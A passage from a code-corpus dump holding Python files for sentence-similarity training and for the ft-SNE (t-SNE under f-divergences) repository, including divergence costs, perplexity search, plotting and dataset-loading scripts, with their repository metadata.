get_feature_X(df,maxlen)\n Y = pd.get_dummies(df.is_duplicate)\n sess = self.sess\n start_index = 0\n final_loss = 0\n current_total_trained =0 \n p_bar = FloatProgress()\n display(p_bar)\n start_time = time.time()\n while start_index < X[0].shape[0]:\n temp_x1 = X[0][start_index:start_index+batch_size]\n temp_x2 = X[1][start_index:start_index+batch_size]\n temp_seq_len1 = X[2][start_index:start_index+batch_size]\n temp_seq_len2 = X[3][start_index:start_index+batch_size]\n test_y = Y[start_index:start_index+batch_size]\n\n feed_dict = {\n self.min_mask1: get_init_min_mask_value(temp_seq_len1),\n self.min_mask2: get_init_min_mask_value(temp_seq_len2),\n self.seq_length1: temp_seq_len1,\n self.seq_length2: temp_seq_len2,\n self.input: temp_x1,\n self.input2: temp_x2,\n self.y: test_y\n }\n \n \n current_total_trained += temp_x1.shape[0]\n \n var_grad = tf.gradients(self.loss, [self.output])[0]\n \n # the exact output you're looking for:\n g = sess.run([var_grad, self.concat_output], feed_dict=feed_dict)\n print(\"gradient %s\" % (g))\n# sys.stdout.write(\"\\r%s/%s training loss %s\" % (start_index, X[0].shape[0], c))\n# sys.stdout.flush()\n duration = time.time() - start_time\n speed = duration/current_total_trained\n eta = (X[0].shape[0]-current_total_trained)*speed\n p_bar.value = current_total_trained/X[0].shape[0]\n p_bar.description = \"%s/%s, eta %s sec\"%(current_total_trained, X[0].shape[0], eta)\n\n start_index += batch_size\n break\n \n final_loss = final_loss/X[0].shape[0]\n return final_loss\n\n\ndef fit(self, train_df, val_df, epochs, dropout_prob=0.2, batch_size=64, check_point_name=\"./default_cnn_model\"):\n\n sess = self.sess\n \n saver = tf.train.Saver(tf.global_variables ())\n 
best_epoch = 0\n    best_loss = 1e9\n    if not os.path.exists(check_point_name):\n        os.mkdir(check_point_name)\n#     saver.save(self.sess, check_point_name+'/model', global_step=0)\n    for i in range(epochs):\n        print(\"training epoch \",i)\n        train_loss, train_acc = evaluate(self,train_df,True,batch_size, sess, dropout_prob=dropout_prob)\n        print(\"train loss:{}, train acc:{}\".format(train_loss, train_acc))\n        loss, acc = evaluate(self, val_df, False, 64, sess)\n        print(\"val loss:{}, val acc:{}\".format(loss, acc))\n        if loss < best_loss:\n            best_epoch = i\n            best_loss = loss\n            print(\"save best_epoch %s to %s\"%(best_epoch,check_point_name))\n            saver.save(self.sess, check_point_name+'/model', global_step=i)\n        \n    return best_loss\n\nfrom keras.models import load_model\ndef tunning_model(model):\n    # dropouts = [0.1, 0.2, 0.3, 0.4, 0.5]\n    dropouts = [0.2]\n    for d in dropouts:\n        print(\"train with dropout %s\"%(d))\n        model.sess.run(model.init)\n        best_loss = fit(model, train_df, val_df, epochs=5, dropout_prob=d, check_point_name=\"./mpcnn_model_%s\"%(d))\n        with open('mpcnn_val_result.txt','a') as f:\n            f.write(str({'dropout': d, 'score': best_loss})+\"\\n\")\n        \n\n# tunning_model(model)\n#\n#\n# import json\n# for line in open('./mpcnn_val_result.txt','r'):\n#     print(line)\n#\n#\n# # dropout 0.2 is best, as loss function = 0.31134441\n#\n#\n# saver = tf.train.Saver()\n#\n# saver.restore(model.sess, './mpcnn_model_0.2/model-2')\n\nimport time\nstart = time.time()\nfor _ in range(10):\n    test_loss, test_acc = evaluate(model, test_df, False, 64, model.sess)\n    print(test_loss, test_acc)\nprint('run time: ', time.time()-start)\n\n\n\n" }, { "alpha_fraction": 0.7309417128562927, "alphanum_fraction": 0.7668161392211914, "avg_line_length": 16.719999313354492, "blob_id": "490c23142ebf483075ee28c7db424b34d1fc61d6", "content_id": "a7d14dea7452235a83d07258e179ad6d9036f6a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 666, "license_type": "no_license", "max_line_length": 102, "num_lines": 25, "path": "/README.md", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# Sentence similarity algorithms\n\n### 1. BM25-based sentence similarity\n\n    Accuracy is very low\n\n### 2. HowNet-based sentence similarity\n\nImplemented on top of [existing work](https://github.com/HuangFJ/text-similarity); accuracy is very low\n\n### 3. Sentence similarity based on word-vector cosine distance\n\nImplemented both via gensim's n_similarity function and from scratch\n\n### 4. Sentence similarity based on word2vec + LSTM\n\nAccuracy: 93%\n\n### 5. mpcnn\n\nTwo third-party implementations of the sentence similarity model from the paper \"Multi-Perspective Sentence Similarity Modeling with Convolutional Neural Networks\":\n\nhttps://github.com/lc222/MPCNN-sentence-similarity-tensorflow\n\nhttps://github.com/yat011/mpcnn\n\n\n\n" } ]
10
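The record above trains the MPCNN model with explicit feed dicts; the simplest baseline its README lists (approach 3) is plain word-vector cosine similarity. Below is a minimal, self-contained sketch of that baseline — `embedding_matrix` and the token-id inputs are assumptions mirroring the variable names used in the record above, and in practice gensim's `n_similarity` covers the same ground:

```python
import numpy as np

def sentence_vector(token_ids, embedding_matrix):
    # Average the word vectors of one tokenised sentence.
    return embedding_matrix[token_ids].mean(axis=0)

def cosine_similarity(q1_ids, q2_ids, embedding_matrix):
    # Cosine similarity between the two averaged sentence vectors.
    v1 = sentence_vector(q1_ids, embedding_matrix)
    v2 = sentence_vector(q2_ids, embedding_matrix)
    return float(np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2) + 1e-8))
```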
jiwoongim/ft-SNE
https://github.com/jiwoongim/ft-SNE
c462f77eb3b9c1901b69b8e67ae9942437ec9ff7
4b5c368ee561c151f36cb25b654830bd38dc9a5b
ec97933d2e493e0c4077a62ac418a407d0f5afa8
refs/heads/master
2022-10-27T10:45:03.158185
2018-09-18T19:04:36
2018-09-18T19:04:36
149,327,619
15
1
MIT
2018-09-18T17:32:54
2022-10-08T12:43:21
2022-10-08T23:36:03
Python
[ { "alpha_fraction": 0.5889233350753784, "alphanum_fraction": 0.6059752106666565, "avg_line_length": 28.20164680480957, "blob_id": "cc05e6105c2d5617caf03315dc0cf2a90b24b88e", "content_id": "342d6d4123f483ca00bd45c45816e893be40c3f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7096, "license_type": "permissive", "max_line_length": 109, "num_lines": 243, "path": "/core.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "\"\"\"\nCode taken from https://raw.githubusercontent.com/hma02/thesne/master/model/tsne.py \nAnd then modified.\n\"\"\"\n\nimport os, sys\nimport theano.tensor as T\nimport theano\nimport numpy as np\n\nfrom utils import dist2hy\n\nimport theano.sandbox.rng_mrg as RNG_MRG\nimport theano.tensor.shared_randomstreams as RNG_TRG\nfrom theano.tensor.shared_randomstreams import RandomStreams\n\nRNG = np.random.RandomState(0)\nMRG = RNG_MRG.MRG_RandomStreams(RNG.randint(2 ** 30))\nTRG = RNG_TRG.RandomStreams(seed=1234)\n\nepsilon = 1e-6\nfloath = np.float32\n\n\ndef sqeuclidean_var(X):\n\n N = X.shape[0]\n ss = (X ** 2).sum(axis=1)\n\n return ss.reshape((N, 1)) + ss.reshape((1, N)) - 2*X.dot(X.T)\n\n\ndef discrete_sample(preds, num_sam, temperature=1.0):\n # function to sample an index from a probability array\n\n probas = TRG.choice(a=np.arange(3), size=[num_sam,], p=preds)\n return np.argmax(probas, axis=1)\n\n\ndef euclidean2_np(X):\n N = X.shape[0]\n ss = np.sum(X**2, axis=1)\n dist = np.reshape(ss, [N, 1]) + np.reshape(ss, [1, N]) - 2*np.dot(X, X.T)\n dist = dist * np.asarray(dist>0,'float32')\n return dist \n\n\ndef p_Xp_given_X_np(X, sigma, metric, approxF=0):\n\n N = X.shape[0]\n if metric == 'euclidean':\n sqdistance = euclidean2_np(X)\n elif metric == 'precomputed':\n sqdistance = X**2\n else:\n raise Exception('Invalid metric')\n euc_dist = np.exp(-sqdistance / (np.reshape(2*(sigma**2), [N, 1])))\n np.fill_diagonal(euc_dist, 0.0 )\n\n if approxF > 0:\n sorted_euc_dist = euc_dist[:,:]\n np.sort(sorted_euc_dist, axis=1)\n row_sum = np.reshape(np.sum(sorted_euc_dist[:,1:approxF+1], axis=1), [N, 1])\n else:\n row_sum = np.reshape(np.sum(euc_dist, axis=1), [N, 1])\n\n return euc_dist/row_sum # Possibly dangerous\n\n\ndef p_Xp_given_X_var(X, sigma, metric):\n N = X.shape[0]\n\n if metric == 'euclidean':\n sqdistance = sqeuclidean_var(X)\n elif metric == 'precomputed':\n sqdistance = X**2\n else:\n raise Exception('Invalid metric')\n\n esqdistance = T.exp(-sqdistance / ((2 * (sigma**2)).reshape((N, 1))))\n esqdistance_zd = T.fill_diagonal(esqdistance, 0)\n\n row_sum = T.sum(esqdistance_zd, axis=1).reshape((N, 1))\n\n return esqdistance_zd/row_sum \n\n\ndef p_Xp_X_var(p_Xp_given_X):\n return (p_Xp_given_X + p_Xp_given_X.T) / 2.0\n\n\ndef p_Yp_Y_var(Y):\n N = Y.shape[0]\n sqdistance = sqeuclidean_var(Y)\n one_over = T.fill_diagonal(1/(sqdistance + 1), 0)\n p_Yp_given_Y = one_over/one_over.sum(axis=1).reshape((N, 1)) \n return p_Yp_given_Y\n\n\ndef p_Yp_Y_var_np(Y):\n N = Y.shape[0]\n sqdistance = euclidean2_np(Y)\n one_over = 1./(sqdistance + 1)\n p_Yp_given_Y = one_over/one_over.sum(axis=1).reshape((N, 1)) \n return p_Yp_given_Y\n\n\ndef kl_cost_var(X, Y, sigma, metric):\n\n p_Xp_given_X = p_Xp_given_X_var(X, sigma, metric)\n PX = p_Xp_X_var(p_Xp_given_X)\n PY = p_Yp_Y_var(Y)\n\n PXc = T.maximum(PX, epsilon)\n PYc = T.maximum(PY, epsilon)\n return T.mean(T.sum(PX * T.log(PXc / PYc),-1)) \n\n\ndef reverse_kl_cost_var(X, Y, sigma, metric):\n\n p_Xp_given_X = p_Xp_given_X_var(X, sigma, 
metric)\n PX = p_Xp_X_var(p_Xp_given_X)\n PY = p_Yp_Y_var(Y)\n\n PXc = T.maximum(PX, epsilon)\n PYc = T.maximum(PY, epsilon)\n return -T.mean(T.sum(PY * T.log(PXc / PYc),-1)) \n\ndef js_cost_var(X, Y, sigma, metric):\n\n return kl_cost_var(X, Y, sigma, metric) * 0.5 + \\\n reverse_kl_cost_var(X, Y, sigma, metric) * 0.5\n\n\ndef chi_square_cost_var(X, Y, sigma, metric):\n\n p_Xp_given_X = p_Xp_given_X_var(X, sigma, metric)\n PX = p_Xp_X_var(p_Xp_given_X)\n PY = p_Yp_Y_var(Y)\n\n PXc = T.maximum(PX, epsilon)\n PYc = T.maximum(PY, epsilon)\n return T.mean(T.sum(PY * (PXc / PYc - 1.)**2, -1)) \n\n\ndef hellinger_cost_var(X, Y, sigma, metric):\n\n p_Xp_given_X = p_Xp_given_X_var(X, sigma, metric)\n PX = p_Xp_X_var(p_Xp_given_X)\n PY = p_Yp_Y_var(Y)\n\n PXc = T.maximum(PX, epsilon)\n PYc = T.maximum(PY, epsilon)\n return T.mean(T.sum(PY * (T.sqrt(PXc / PYc) - 1.)**2,-1)) \n\n\ndef find_sigma(X_shared, sigma_shared, N, perplexity, sigma_iters,\n metric, verbose=0):\n \"\"\"Binary search on sigma for a given perplexity.\"\"\"\n X = T.fmatrix('X')\n sigma = T.fvector('sigma')\n\n target = np.log(perplexity)\n\n P = T.maximum(p_Xp_given_X_var(X, sigma, metric), epsilon)\n\n entropy = -T.sum(P*T.log(P), axis=1)\n\n # Setting update for binary search interval\n sigmin_shared = theano.shared(np.full(N, np.sqrt(epsilon), dtype=floath))\n sigmax_shared = theano.shared(np.full(N, np.inf, dtype=floath))\n\n sigmin = T.fvector('sigmin')\n sigmax = T.fvector('sigmax')\n\n upmin = T.switch(T.lt(entropy, target), sigma, sigmin)\n upmax = T.switch(T.gt(entropy, target), sigma, sigmax)\n\n givens = {X: X_shared, sigma: sigma_shared, sigmin: sigmin_shared,\n sigmax: sigmax_shared}\n updates = [(sigmin_shared, upmin), (sigmax_shared, upmax)]\n\n update_intervals = theano.function([], entropy, givens=givens,\n updates=updates)\n\n # Setting update for sigma according to search interval\n upsigma = T.switch(T.isinf(sigmax), sigma*2, (sigmin + sigmax)/2.)\n\n givens = {sigma: sigma_shared, sigmin: sigmin_shared,\n sigmax: sigmax_shared}\n updates = [(sigma_shared, upsigma)]\n\n update_sigma = theano.function([], sigma, givens=givens, updates=updates)\n\n for i in range(sigma_iters):\n e = update_intervals()\n update_sigma()\n if verbose:\n print('Iteration: {0}.'.format(i+1))\n print('Perplexities in [{0:.4f}, {1:.4f}].'.format(np.exp(e.min()),\n np.exp(e.max())))\n\n if np.any(np.isnan(np.exp(e))):\n raise Exception('Invalid sigmas. The perplexity is probably too low.')\n\n\ndef find_sigma_np(X, sigma, N, perplexity, sigma_iters, metric, verbose=1, approxF=0):\n\n \"\"\"Binary search on sigma for a given perplexity.\"\"\"\n target = np.log(perplexity)\n\n # Setting update for binary search interval\n sigmin = np.full(N, np.sqrt(epsilon), dtype='float32')\n sigmax = np.full(N, np.inf, dtype='float32')\n\n for i in range(sigma_iters):\n\n P = np.maximum(p_Xp_given_X_np(X, sigma, metric, approxF), epsilon)\n entropy = -np.sum(P*np.log(P), axis=1)\n minind = np.argwhere(entropy < target).flatten()\n maxind = np.argwhere(entropy > target).flatten()\n sigmin[minind] = sigma[minind]\n sigmax[maxind] = sigma[maxind]\n\n infmask = np.argwhere(np.isinf(sigmax)).flatten()\n old_sigma = sigma[infmask]\n sigma = (sigmin + sigmax)/2.\n sigma[infmask] = old_sigma*2\n\n\n if verbose:\n print('Iteration: {0}.'.format(i+1))\n print('Perplexities in [{0:.4f}, {1:.4f}].'.format(np.exp(entropy.min()), np.exp(entropy.max())))\n\n if np.any(np.isnan(np.exp(entropy))):\n raise Exception('Invalid sigmas. 
The perplexity is probably too low.')\n\n\n return sigma\n\nif __name__ == '__main__':\n asdf = discrete_sample(np.asarray([0.3,0.2,0.5]), 1000)\n import pdb; pdb.set_trace()\n" }, { "alpha_fraction": 0.5486871004104614, "alphanum_fraction": 0.5756747126579285, "avg_line_length": 31.247058868408203, "blob_id": "4c5cb9155dac33dd601b680df6416bd2106d5d58", "content_id": "8cbfe5d5327b05797db51a0a270b90a4629cf139", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5484, "license_type": "permissive", "max_line_length": 102, "num_lines": 170, "path": "/utils_sne.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "import os, sys, gzip, pickle, cPickle\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nfrom utils import unpickle\nfrom core import p_Xp_given_X_np, p_Yp_Y_var_np\n\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef plot_map_news(xx, colors, color_dict, fname):\n\n plt.figure()\n ax = plt.subplot(111)\n\n area = np.pi * 4 #* (15 * np.random.rand(N))**2 # 0 to 15 point radii\n #jfor i, x in enumerate(xx):\n #j plt.scatter(xx[i,0], xx[i,1], s=area, c=colors[i], alpha=0.5, cmap=plt.cm.Spectral)\n\n for i, x in enumerate(xx):\n plt.scatter(x[0], x[1], s=area, c=color_dict[colors[i]], alpha=0.7, facecolor='0.8', lw = 0)\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=3)\n plt.axis('off')\n plt.savefig(fname, bbox_inches='tight', format='pdf')\n\n\ndef plot_map_c(xx, colors, fname):\n\n plt.figure()\n ax = plt.subplot(111)\n\n area = np.pi * 4 #* (15 * np.random.rand(N))**2 # 0 to 15 point radii\n #jfor i, x in enumerate(xx):\n #j plt.scatter(xx[i,0], xx[i,1], s=area, c=colors[i], alpha=0.5, cmap=plt.cm.Spectral)\n plt.scatter(xx[:,0], xx[:,1], s=area, c=colors, alpha=1.0, cmap=plt.cm.Spectral, \\\n facecolor='0.5', lw = 0)\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=3)\n plt.axis('off')\n plt.savefig(fname, bbox_inches='tight', format='pdf')\n\n\ndef plot1D(xx, colors, fname):\n\n plt.figure()\n ax = plt.subplot(111)\n\n area = np.pi * 5 #* (15 * np.random.rand(N))**2 # 0 to 15 point radii\n #jfor i, x in enumerate(xx):\n #j plt.scatter(xx[i,0], xx[i,1], s=area, c=colors[i], alpha=0.5, cmap=plt.cm.Spectral)\n #plt.plot(xx, c=colorVal, alpha=0.9, lw = 0)\n dummy = np.zeros_like(xx)\n plt.scatter(xx, dummy, s=area, c=colors, alpha=0.9, cmap=plt.cm.Spectral, facecolor='0.5', lw = 0)\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=3)\n\n plt.savefig(fname, bbox_inches='tight', format='pdf')\n\n\n\ndef plot3D(xx, colors, fname):\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n area = np.pi *5 #* (15 * np.random.rand(N))**2 # 0 to 15 point radii\n ax.scatter(xx[:,0], xx[:,1], xx[:,2], c=colors, s=area, alpha=0.5, cmap=plt.cm.Spectral, \\\n facecolor='0.5', lw = 0)\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1., box.height])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, 
ncol=3)\n    plt.axis('off')\n    plt.savefig(fname, bbox_inches='tight', format='pdf', transparent=True)\n\n\ndef precision_K(p_sorted_ind, q_sorted_ind, Ks, K=3):\n\n    p_sorted_ind = p_sorted_ind[:, :K]\n    q_sorted_ind = q_sorted_ind[:, :K]\n    N = p_sorted_ind.shape[0]\n\n    accuracy = np.zeros((N,len(Ks)))\n\n    # For each point in x compute the distance of K points in P and Q\n    for j,kk in enumerate(Ks):\n        for i in xrange(N):\n            for k in xrange(kk):\n                ind_k = q_sorted_ind[i, k]\n                tmp_k = np.argwhere(ind_k == p_sorted_ind[i,:kk]).flatten()\n                if tmp_k.shape[0] > 0:\n                    accuracy[i,j] += 1.0\n\n    # Count the number of correct indices \n    outputs = []\n    for jj in xrange(len(Ks)):\n        outputs += [[np.mean(accuracy[:,jj]), np.std(accuracy[:,jj])]]\n\n    return outputs\n\n\ndef K_neighbours(data, maxK=10, revF=False, sigma=None):\n\n    from utils import dist2hy_np\n    #dists = dist2hy_np(data, data)\n    if sigma is not None:\n        dists = p_Xp_given_X_np(data, sigma, 'euclidean')\n    else:\n        dists = p_Yp_Y_var_np(data)\n    N, _ = dists.shape\n    sorted_ind_p = np.zeros((N,maxK), dtype='int32')\n\n    for i in xrange(N):sorted_ind_p[i,:] = np.argsort(dists[i,:])[1:maxK+1]\n    if revF: sorted_ind_p = sorted_ind_p[:,::-1]\n\n    return sorted_ind_p, dists\n\n\ndef neighbour_accuracy_K(data, labels, Ks, maxK=10):\n\n    #from utils import dist2hy_np\n    #dists = dist2hy_np(data, data)\n    N, _ = data.shape\n\n    fractions = []\n    for i in xrange(N):\n\n        #ind_sort = np.argsort(dists[i,:])[1:maxK+1]\n        ind_sort = data[i,:]\n        label = labels[i]\n        neighbor_labels = labels[ind_sort]\n        fraction = np.asarray(neighbor_labels == label) * 1.0\n        fractions.append(fraction)\n\n    fractions = np.asarray(fractions)\n    output = []\n    for K in Ks:\n        output += [np.mean(np.sum(fractions[:,:K], axis=1) / K), \\\n                        np.std(np.sum(fractions[:,:K], axis=1) / K)]\n\n    return output\n\n\ndef get_iris_data():\n\n    data, label = [], []\n    f = open('/groups/branson/home/imd/Documents/data/embedding_data/iris.txt', 'r')\n    line = f.readline()\n    data.append(line[:-1])\n    label.append(line[-1])\n    while line.strip() != '':\n        line = f.readline()\n        data.append(line[:-1])\n        label.append(line[-1])\n\n    return np.asarray(data), np.asarray(label)\n\n\n" }, { "alpha_fraction": 0.5690361261367798, "alphanum_fraction": 0.595087468624115, "avg_line_length": 30.5, "blob_id": "09723dfac86ad54f64e12abd2cf72d2f677cf05d", "content_id": "339a42bad2564fea7afefff86ed4a921ced49cc2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2687, "license_type": "permissive", "max_line_length": 136, "num_lines": 88, "path": "/run.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "import os, sys, gzip, pickle, cPickle, argparse\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nfrom tsne import tsne\n\nfrom utils import unpickle, plot_map\nfrom utils_sne import precision_K, K_neighbours\n\nfrom sklearn.decomposition import PCA\nRNG = np.random.RandomState(0)\n\ndef parse_args():\n    desc = \"Theano implementation of Stochastic Neighbour Embedding under f-divergence (ft-SNE)\"\n    parser = argparse.ArgumentParser(description=desc)\n\n    parser.add_argument('--dataset_path', type=str, \\\n                        default='./data/',\\\n                        help='Dataset directory')\n    parser.add_argument('--divtypet', type=str, default='kl', \\\n                        choices=['kl','rkl','js','hl', 'ch'],\n                        help='Choose your f-divergence')\n    parser.add_argument('--perplexity_tsne', type=int, default=100, \\\n                        help='Perplexity')\n\n    return parser.parse_args()\n\n\n\nif __name__ == 
'__main__':\n\n    args = parse_args()\n    divtypet = args.divtypet\n    dataset_path = args.dataset_path\n    perplexity_tsne = args.perplexity_tsne\n\n    dataset_path = dataset_path \n    data  = np.load(dataset_path+'/data.npy')\n    label = np.load(dataset_path+'/label.npy')\n    datatype='mydata'\n\n    pca = PCA(n_components=30)\n    pcastr = 'pca30'\n\n    data = pca.fit(data).transform(data)\n    perm = RNG.permutation(data.shape[0])\n    data = data [perm][:6000]\n    color= label[perm][:6000]\n    initial_momentum=0.5\n    n_epochs_tsne=2000; \n    if divtypet=='hl':\n        initial_lr_tsne=300\n        momentum_switch=200\n        lrDecay=100\n    elif divtypet=='ch':\n        initial_lr_tsne=10;\n        momentum_switch=200\n        lrDecay=100\n    elif divtypet=='rkl':\n        initial_lr_tsne=1000; \n        momentum_switch=200\n        lrDecay=100\n    elif divtypet=='js':\n        initial_lr_tsne=1000;\n        momentum_switch=200\n        lrDecay=100\n    else:\n        initial_lr_tsne=2500\n        momentum_switch=200\n        lrDecay=100\n\n    print 'Divtype %s, Perplexity %d' % (divtypet, perplexity_tsne)\n    fname = '/'+datatype+'/'+divtypet+'/tsne_'+str(perplexity_tsne)+'perp'+str(n_epochs_tsne)+'epoch_initlr'+str(initial_lr_tsne)+pcastr\n    projX = tsne(data, \n                initial_lr=initial_lr_tsne, \\\n                final_lr=initial_lr_tsne,\\\n                lrDecay=lrDecay,\\\n                initial_momentum=initial_momentum,\\\n                momentum_switch=momentum_switch,\\\n                perplexity=perplexity_tsne, \\\n                n_epochs=n_epochs_tsne, fname=fname, \\\n                color=color, divtype=divtypet, datatype=datatype)\n\n    print(fname)\n    pass\n\n\n\n" }, { "alpha_fraction": 0.5112971663475037, "alphanum_fraction": 0.5499734282493591, "avg_line_length": 33.342464447021484, "blob_id": "7014485bdc2fa3164e05ff4fabd4269b215aff0d", "content_id": "0982538daedef5c3f41cde3ad0aaa7ff8c725142", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7524, "license_type": "permissive", "max_line_length": 139, "num_lines": 219, "path": "/main.py", "repo_name": "jiwoongim/ft-SNE", "src_encoding": "UTF-8", "text": "import os, sys, gzip, pickle, cPickle, argparse\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nfrom tsne import tsne\n\nfrom utils import unpickle, plot_map\nfrom utils_sne import precision_K, K_neighbours\n\nfrom sklearn.decomposition import PCA\nRNG = np.random.RandomState(0)\n\ndef parse_args():\n    desc = \"Theano implementation of Stochastic Neighbour Embedding under f-divergence (ft-SNE)\"\n    parser = argparse.ArgumentParser(description=desc)\n\n    parser.add_argument('--datatype', type=str, default='mnist', \\\n                        choices=['mnist','mnist1','face','news'],\n                        help='The name of dataset')\n    parser.add_argument('--dataset_path', type=str, \\\n                        default='./data/',\\\n                        help='Dataset directory')\n    parser.add_argument('--divtypet', type=str, default='kl', \\\n                        choices=['kl','rkl','js','hl', 'ch'],\n                        help='Choose your f-divergence')\n    parser.add_argument('--perplexity_tsne', type=int, default=100, \\\n                        help='Perplexity')\n\n    return parser.parse_args()\n\n\n\nif __name__ == '__main__':\n\n    args = parse_args()\n    divtypet = args.divtypet\n    dataset_path = args.dataset_path\n    perplexity_tsne = args.perplexity_tsne\n\n    if args.datatype == 'mnist':\n        dataset_path = dataset_path + '/mnist.pkl.gz'\n        f = gzip.open(dataset_path, 'rb')\n        train_set_np, valid_set_np, test_set_np = cPickle.load(f)\n\n        ind0 = np.argwhere(train_set_np[1] == 0).flatten()\n        ind1 = np.argwhere(train_set_np[1] == 1).flatten()\n        ind2 = np.argwhere(train_set_np[1] == 2).flatten()\n        ind3 = np.argwhere(train_set_np[1] == 4).flatten()\n        ind4 = np.argwhere(train_set_np[1] == 
5).flatten()\n ind = np.concatenate([ind0, ind1, ind2, ind3, ind4])\n\n data = train_set_np[0][ind]\n label= train_set_np[1][ind]\n pca = PCA(n_components=30)\n pcastr = 'pca30_5class'\n\n data = pca.fit(data).transform(data)\n perm = RNG.permutation(data.shape[0])\n data = data [perm][:6000]\n color= label[perm][:6000]\n initial_momentum=0.5\n n_epochs_tsne=2000; \n if divtypet=='hl':\n initial_lr_tsne=300\n momentum_switch=200\n lrDecay=100\n elif divtypet=='ch':\n initial_lr_tsne=10;\n momentum_switch=200\n lrDecay=100\n elif divtypet=='rkl':\n initial_lr_tsne=1000; \n momentum_switch=200\n lrDecay=100\n elif divtypet=='js':\n initial_lr_tsne=1000;\n momentum_switch=200\n lrDecay=100\n else:\n initial_lr_tsne=2500\n momentum_switch=200\n lrDecay=100\n\n elif args.datatype == 'mnist1':\n dataset_path = dataset_path + '/MNIST/mnist.pkl.gz'\n f = gzip.open(dataset_path, 'rb')\n train_set_np, valid_set_np, test_set_np = cPickle.load(f)\n\n ind = np.argwhere(train_set_np[1] == 1).flatten()\n\n data = train_set_np[0][ind]\n label= train_set_np[1][ind]\n pca = PCA(n_components=30)\n pcastr = 'pca30_1class'\n data = pca.fit(data).transform(data)\n perm = RNG.permutation(data.shape[0])\n data = data [perm][:5000]\n color= label[perm][:5000]\n\n\n initial_momentum=0.5; momentum_switch=200\n n_epochs_tsne=200; \n if divtypet=='hl':\n initial_lr_tsne=300\n lrDecay=100\n elif divtypet=='ch':\n initial_lr_tsne=5; \n momentum_switch=1\n lrDecay=100\n elif divtypet=='rkl':\n initial_lr_tsne=1000; \n lrDecay=100\n elif divtypet=='js':\n initial_lr_tsne=1000; \n lrDecay=100\n else:\n initial_lr_tsne=1000 \n lrDecay=100\n\n elif args.datatype == 'face':\n \n import scipy.io as sio\n mat_contents = sio.loadmat(dataset_path+'/face_data.mat')\n data = mat_contents['images'].T\n light = (mat_contents['lights'].T - mat_contents['lights'].T.min()) / mat_contents['lights'].T.max()\n poses = (mat_contents['poses'].T - mat_contents['poses'].T.min()) / (mat_contents['poses'].T.max() - mat_contents['poses'].T.min())\n color = poses[:,0] \n \n n_epochs_tsne=1000; \n pcastr = 'pose1'\n if divtypet=='hl':\n initial_momentum=0.5\n initial_lr_tsne=100\n momentum_switch=100\n lrDecay=10.0\n elif divtypet=='ch':\n initial_momentum=0.5\n initial_lr_tsne=100\n momentum_switch=100\n lrDecay=10\n elif divtypet=='rkl':\n initial_momentum=0.5\n initial_lr_tsne=1000; \n momentum_switch=25\n lrDecay=50\n elif divtypet=='js':\n initial_momentum=0.5\n initial_lr_tsne=1000;\n momentum_switch=200\n lrDecay=100\n else:\n initial_momentum=0.5\n initial_lr_tsne=1000 \n momentum_switch=200\n lrDecay=100\n\n elif args.datatype == 'news':\n\n from sklearn.datasets import fetch_20newsgroups\n from sklearn.feature_extraction.text import TfidfVectorizer\n categories = ['rec.autos', 'rec.motorcycles', 'rec.sport.baseball', 'rec.sport.hockey', \\\n 'sci.crypt', 'sci.electronics', 'sci.med', 'sci.space', 'soc.religion.christian', \\\n 'talk.politics.guns', 'talk.politics.mideast', 'talk.politics.misc', 'talk.religion.misc']\n newsgroups_train = fetch_20newsgroups(subset='train', categories=categories)\n vectorizer = TfidfVectorizer()\n data = vectorizer.fit_transform(newsgroups_train.data).todense().astype('float32')\n\n color = newsgroups_train.target\n pca = PCA(n_components=30)\n pcastr = '_pca30_3hier'\n\n data = pca.fit(data).transform(data)\n data, color = data[:6000], color[:6000]\n data = data / (data.max()-data.min()) \n n_epochs_tsne=300; \n if divtypet=='hl':\n initial_momentum=0.5\n initial_lr_tsne=100\n momentum_switch=200\n 
